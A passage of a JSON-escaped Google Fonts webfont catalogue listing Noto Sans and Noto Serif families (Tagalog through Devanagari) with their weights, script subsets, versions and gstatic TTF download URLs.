\"http://fonts.gstatic.com/s/notosanstagalog/v17/J7aFnoNzCnFcV9ZI-sUYuvote1R0wwEAA8jHexnL.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Tagbanwa\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tagbanwa\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanstagbanwa/v17/Y4GWYbB8VTEp4t3MKJSMmQdIKjRtt_nZRjQEaYpGoQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Tai Le\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tai-le\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanstaile/v17/vEFK2-VODB8RrNDvZSUmVxEATwR58tK1W77HtMo.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Tai Tham\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tai-tham\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanstaitham/v19/kJEbBv0U4hgtwxDUw2x9q7tbjLIfbPGHBoaVSAZ3MdLJBCUbPgquyaRGKMw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanstaitham/v19/kJEbBv0U4hgtwxDUw2x9q7tbjLIfbPGHBoaVSAZ3MdLJBBcbPgquyaRGKMw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanstaitham/v19/kJEbBv0U4hgtwxDUw2x9q7tbjLIfbPGHBoaVSAZ3MdLJBPscPgquyaRGKMw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanstaitham/v19/kJEbBv0U4hgtwxDUw2x9q7tbjLIfbPGHBoaVSAZ3MdLJBMIcPgquyaRGKMw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Tai Viet\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tai-viet\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanstaiviet/v16/8QIUdj3HhN_lv4jf9vsE-9GMOLsaSPZr644fWsRO9w.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Takri\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"takri\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanstakri/v21/TuGJUVpzXI5FBtUq5a8bnKIOdTwQNO_W3khJXg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Tamil\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tamil\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7vGor0RqKDt_EvT.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7tGo70RqKDt_EvT.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7uYo70RqKDt_EvT.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7vGo70RqKDt_EvT.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7v0o70RqKDt_EvT.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7sYpL0RqKDt_EvT.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7shpL0RqKDt_EvT.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7tGpL0RqKDt_EvT.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7tvpL0RqKDt_EvT.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Tamil Supplement\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"tamil-supplement\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanstamilsupplement/v19/DdTz78kEtnooLS5rXF1DaruiCd_bFp_Ph4sGcn7ax_vsAeMkeq1x.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Tangsa\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tangsa\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanstangsa/v1/z7NCdQPmcigbbZAIOl9igP26K470lICpky0-peX5Qp1YkyoRYdplyJDA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanstangsa/v1/z7NCdQPmcigbbZAIOl9igP26K470lICpky0-peX5Qp1qkyoRYdplyJDA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanstangsa/v1/z7NCdQPmcigbbZAIOl9igP26K470lICpky0-peX5Qp2GlCoRYdplyJDA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanstangsa/v1/z7NCdQPmcigbbZAIOl9igP26K470lICpky0-peX5Qp2_lCoRYdplyJDA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Telugu\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"telugu\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEntezfqQUbf-3v37w.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEnt-zbqQUbf-3v37w.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEntJTbqQUbf-3v37w.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEntezbqQUbf-3v37w.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEntSTbqQUbf-3v37w.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEntpTHqQUbf-3v37w.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEntnDHqQUbf-3v37w.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEnt-zHqQUbf-3v37w.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEnt0jHqQUbf-3v37w.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Thaana\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thaana\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansthaana/v18/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4XrbxLhnu4-tbNu.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansthaana/v18/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4VrbhLhnu4-tbNu.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansthaana/v18/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4W1bhLhnu4-tbNu.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansthaana/v18/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4XrbhLhnu4-tbNu.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansthaana/v18/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4XZbhLhnu4-tbNu.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansthaana/v18/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4U1aRLhnu4-tbNu.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansthaana/v18/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4UMaRLhnu4-tbNu.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansthaana/v18/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4VraRLhnu4-tbNu.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansthaana/v18/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4VCaRLhnu4-tbNu.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Thai\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdU5RspzF-QRvzzXg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdUxRtpzF-QRvzzXg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdU8ptpzF-QRvzzXg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdU5RtpzF-QRvzzXg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdU6ZtpzF-QRvzzXg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdU0pqpzF-QRvzzXg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdU3NqpzF-QRvzzXg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdUxRqpzF-QRvzzXg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansthai/v20/iJWnBXeUZi_OHPqn4wq6hQ2_hbJ1xyN9wd43SofNWcd1MKVQt_So_9CdUz1qpzF-QRvzzXg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Thai Looped\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"thai\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansthailooped/v12/B50fF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3YX6AYeCT_Wfd1.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansthailooped/v12/B50cF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3Y84E4UgrzUO5sKA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansthailooped/v12/B50cF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3Yl4I4UgrzUO5sKA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansthailooped/v12/B50RF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3gO6ocWiHvWQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansthailooped/v12/B50cF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3Yz4M4UgrzUO5sKA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansthailooped/v12/B50cF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3Y44Q4UgrzUO5sKA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansthailooped/v12/B50cF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3Yh4U4UgrzUO5sKA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansthailooped/v12/B50cF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3Ym4Y4UgrzUO5sKA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansthailooped/v12/B50cF6pOpWTRcGrhOVJJ3-oPfY7WQuFu5R3Yv4c4UgrzUO5sKA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Tifinagh\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tifinagh\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanstifinagh/v17/I_uzMoCduATTei9eI8dawkHIwvmhCvbn6rnEcXfs4Q.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Tirhuta\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"tirhuta\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanstirhuta/v15/t5t6IQYRNJ6TWjahPR6X-M-apUyby7uGUBsTrn5P.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Ugaritic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"ugaritic\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansugaritic/v15/3qTwoiqhnSyU8TNFIdhZVCwbjCpkAXXkMhoIkiazfg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Vai\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vai\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansvai/v17/NaPecZTSBuhTirw6IaFn_UrURMTsDIRSfr0.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Wancho\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"wancho\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanswancho/v17/zrf-0GXXyfn6Fs0lH9P4cUubP0GBqAPopiRfKp8.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Warang Citi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"warang-citi\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanswarangciti/v17/EYqtmb9SzL1YtsZSScyKDXIeOv3w-zgsNvKRpeVCCXzdgA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Yi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"yi\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansyi/v18/sJoD3LFXjsSdcnzn071rO3apxVDJNVgSNg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Zanabazar Square\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"zanabazar-square\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanszanabazarsquare/v16/Cn-jJsuGWQxOjaGwMQ6fOicyxLBEMRfDtkzl4uagQtJxOCEgN0Gc.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notoserif/v21/ga6Iaw1J5X9T9RW6j9bNTFAcaRi_bMQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/notoserif/v21/ga6Kaw1J5X9T9RW6j9bNfFIWbTq6fMRRMw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserif/v21/ga6Law1J5X9T9RW6j9bNdOwzTRCUcM1IKoY.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/notoserif/v21/ga6Vaw1J5X9T9RW6j9bNfFIu0RWedO9NOoYIDg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Ahom\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"ahom\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifahom/v17/FeVIS0hfp6cprmEUffAW_fUL_AN-wuYrPFiwaw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Armenian\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"armenian\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoserifarmenian/v23/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZi8ObxvXagGdkbg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoserifarmenian/v23/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZC8KbxvXagGdkbg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifarmenian/v23/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZ1cKbxvXagGdkbg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifarmenian/v23/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZi8KbxvXagGdkbg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifarmenian/v23/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZucKbxvXagGdkbg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifarmenian/v23/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZVcWbxvXagGdkbg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifarmenian/v23/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZbMWbxvXagGdkbg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoserifarmenian/v23/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZC8WbxvXagGdkbg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifarmenian/v23/3XFMEqMt3YoFsciDRZxptyCUKJmytZ0kVU-XvF7QaZuL85rnQ_zDNzDe5xNnKxyZIsWbxvXagGdkbg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Balinese\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"balinese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifbalinese/v16/QdVKSS0-JginysQSRvuCmUMB_wVeQAxXRbgJdhapcUU.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Bengali\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"bengali\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JfcAH3qn4LjQH8yD.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JfeAHnqn4LjQH8yD.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JfdeHnqn4LjQH8yD.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JfcAHnqn4LjQH8yD.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JfcyHnqn4LjQH8yD.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JffeGXqn4LjQH8yD.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JffnGXqn4LjQH8yD.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JfeAGXqn4LjQH8yD.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifbengali/v19/hYkuPvggTvnzO14VSXltirUdnnkt1pwmWrprmO7RjE0a5BtdATYU1crFaM_5JfepGXqn4LjQH8yD.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Devanagari\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTA-og-HMUe1u_dv.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTC-ow-HMUe1u_dv.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTBgow-HMUe1u_dv.ttf\",\n        \"regular\": 